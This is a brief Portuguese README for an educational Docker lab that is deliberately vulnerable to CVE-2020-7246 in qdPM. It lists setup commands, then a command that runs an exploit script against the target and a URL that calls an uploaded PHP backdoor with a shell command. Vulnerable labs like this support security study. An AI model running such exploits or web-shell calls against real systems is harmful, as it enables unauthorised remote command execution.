
Uma imagem Docker vulnerável ao CVE-2020-7246.
Apenas para fins educacionais.
Consulte a Referência para detalhes.
$ git clone https://github.com/arafatansari/SecAssignment.git
$ cd SecAssignment
$ docker build -t cve-assignment:ine .
$ docker run -it -p 80:80 cve-assignment:ine
$ service apache2 start | service mysql start
$ python Exploit/exploit.py -url http://{target-ip}/qdpm/ -u [email protected] -p password
$ http://{target-ip}/qdpm/uploads/users/xxxx-backdoor.php?cmd=whoami